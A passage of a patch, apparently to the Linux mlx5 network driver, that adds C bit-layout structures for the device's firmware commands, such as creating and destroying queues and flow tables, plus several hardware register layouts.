mlx5_ifc_get_dropped_packet_log_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_gen_eqe_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; + + u8 eqe[64][0x8]; +}; + +struct mlx5_ifc_gen_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_enable_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_enable_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_drain_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_drain_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_disable_hca_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_disable_hca_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 function_id[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_detach_from_mcg_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_detach_from_mcg_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 
multicast_gid[16][0x8]; +}; + +struct mlx5_ifc_destroy_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tisn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 tirn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 sqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rqt_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqtn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 rmpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_psv_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_psv_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 psvn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_mkey_in_bits { + u8 opcode[0x10]; + u8 
reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 mkey_index[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x140]; +}; + +struct mlx5_ifc_destroy_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 group_id[0x20]; + + u8 reserved_5[0x120]; +}; + +struct mlx5_ifc_destroy_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 eq_number[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dctn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_destroy_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_destroy_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 cqn[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_delete_vxlan_udp_dport_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_vxlan_udp_dport_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 vxlan_udp_port[0x10]; +}; + +struct mlx5_ifc_delete_l2_table_entry_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_l2_table_entry_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x8]; + u8 table_index[0x18]; + + u8 reserved_4[0x140]; +}; + +struct mlx5_ifc_delete_fte_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_delete_fte_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x40]; + + u8 flow_index[0x20]; + + u8 reserved_6[0xe0]; +}; + +struct mlx5_ifc_dealloc_xrcd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_xrcd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrcd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct 
mlx5_ifc_dealloc_uar_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_uar_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 uar[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_transport_domain_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_transport_domain_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_q_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x18]; + u8 counter_set_id[0x8]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_dealloc_pd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_dealloc_pd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 pd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_create_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_xrc_srqc_bits xrc_srq_context_entry; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_tis_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 tisn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_tis_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_tisc_bits ctx; +}; + +struct mlx5_ifc_create_tir_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 tirn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_tir_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_tirc_bits ctx; +}; + +struct mlx5_ifc_create_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 srqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_srqc_bits srq_context_entry; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_sq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 sqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_sq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_sqc_bits ctx; +}; + +struct mlx5_ifc_create_rqt_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rqtn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rqt_in_bits { + 
u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rqtc_bits rqt_context; +}; + +struct mlx5_ifc_create_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rqc_bits ctx; +}; + +struct mlx5_ifc_create_rmp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 rmpn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_rmp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0xc0]; + + struct mlx5_ifc_rmpc_bits ctx; +}; + +struct mlx5_ifc_create_qp_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 qpn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_qp_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 opt_param_mask[0x20]; + + u8 reserved_3[0x20]; + + struct mlx5_ifc_qpc_bits qpc; + + u8 reserved_4[0x80]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_psv_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 reserved_2[0x8]; + u8 psv0_index[0x18]; + + u8 reserved_3[0x8]; + u8 psv1_index[0x18]; + + u8 reserved_4[0x8]; + u8 psv2_index[0x18]; + + u8 reserved_5[0x8]; + u8 psv3_index[0x18]; +}; + +struct mlx5_ifc_create_psv_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 num_psv[0x4]; + u8 reserved_2[0x4]; + u8 pd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_create_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 mkey_index[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_mkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 pg_access[0x1]; + u8 reserved_3[0x1f]; + + struct mlx5_ifc_mkc_bits memory_key_mkey_entry; + + u8 reserved_4[0x80]; + + u8 translations_octword_actual_size[0x20]; + + u8 reserved_5[0x560]; + + u8 klm_pas_mtt[0][0x20]; +}; + +struct mlx5_ifc_create_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 table_id[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x8]; + u8 level[0x8]; + u8 reserved_6[0x8]; + u8 log_size[0x8]; + + u8 reserved_7[0x120]; +}; + +struct mlx5_ifc_create_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 group_id[0x18]; + + u8 reserved_2[0x20]; +}; + +enum { + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_OUTER_HEADERS = 0x0, + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_MISC_PARAMETERS = 0x1, + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_INNER_HEADERS = 0x2, +}; + +struct mlx5_ifc_create_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 
table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x20]; + + u8 start_flow_index[0x20]; + + u8 reserved_6[0x20]; + + u8 end_flow_index[0x20]; + + u8 reserved_7[0xa0]; + + u8 reserved_8[0x18]; + u8 match_criteria_enable[0x8]; + + struct mlx5_ifc_fte_match_param_bits match_criteria; + + u8 reserved_9[0xe00]; +}; + +struct mlx5_ifc_create_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x18]; + u8 eq_number[0x8]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_eqc_bits eq_context_entry; + + u8 reserved_3[0x40]; + + u8 event_bitmask[0x40]; + + u8 reserved_4[0x580]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 dctn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_dctc_bits dct_context_entry; + + u8 reserved_3[0x180]; +}; + +struct mlx5_ifc_create_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 cqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_config_int_moderation_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x4]; + u8 min_delay[0xc]; + u8 int_vector[0x10]; + + u8 reserved_2[0x20]; +}; + +enum { + MLX5_CONFIG_INT_MODERATION_IN_OP_MOD_WRITE = 0x0, + MLX5_CONFIG_INT_MODERATION_IN_OP_MOD_READ = 0x1, +}; + +struct mlx5_ifc_config_int_moderation_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x4]; + u8 min_delay[0xc]; + u8 int_vector[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_attach_to_mcg_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_attach_to_mcg_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 multicast_gid[16][0x8]; +}; + +struct mlx5_ifc_arm_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ = 0x1, +}; + +struct mlx5_ifc_arm_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x10]; + u8 lwm[0x10]; +}; + +struct mlx5_ifc_arm_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_ARM_RQ_IN_OP_MOD_SRQ_ = 0x1, +}; + +struct mlx5_ifc_arm_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srq_number[0x18]; + + u8 reserved_3[0x10]; + u8 lwm[0x10]; +}; + +struct mlx5_ifc_arm_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct 
mlx5_ifc_arm_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dct_number[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_alloc_xrcd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 xrcd[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_xrcd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_uar_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 uar[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_uar_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_transport_domain_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_transport_domain_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x18]; + u8 counter_set_id[0x8]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_q_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_pd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 pd[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_pd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_add_vxlan_udp_dport_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_add_vxlan_udp_dport_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 vxlan_udp_port[0x10]; +}; + +struct mlx5_ifc_access_register_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 register_data[0][0x20]; +}; + +enum { + MLX5_ACCESS_REGISTER_IN_OP_MOD_WRITE = 0x0, + MLX5_ACCESS_REGISTER_IN_OP_MOD_READ = 0x1, +}; + +struct mlx5_ifc_access_register_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 register_id[0x10]; + + u8 argument[0x20]; + + u8 register_data[0][0x20]; +}; + +struct mlx5_ifc_sltp_reg_bits { + u8 status[0x4]; + u8 version[0x4]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x2]; + u8 lane[0x4]; + u8 reserved_1[0x8]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x7]; + u8 polarity[0x1]; + u8 ob_tap0[0x8]; + u8 ob_tap1[0x8]; + u8 ob_tap2[0x8]; + + u8 reserved_4[0xc]; + u8 ob_preemp_mode[0x4]; + u8 ob_reg[0x8]; + u8 ob_bias[0x8]; + + u8 reserved_5[0x20]; +}; + +struct mlx5_ifc_slrg_reg_bits { + u8 status[0x4]; + u8 version[0x4]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x2]; + u8 lane[0x4]; + u8 reserved_1[0x8]; + + u8 time_to_link_up[0x10]; + u8 reserved_2[0xc]; + u8 grade_lane_speed[0x4]; + + u8 grade_version[0x8]; + u8 grade[0x18]; + + u8 reserved_3[0x4]; + u8 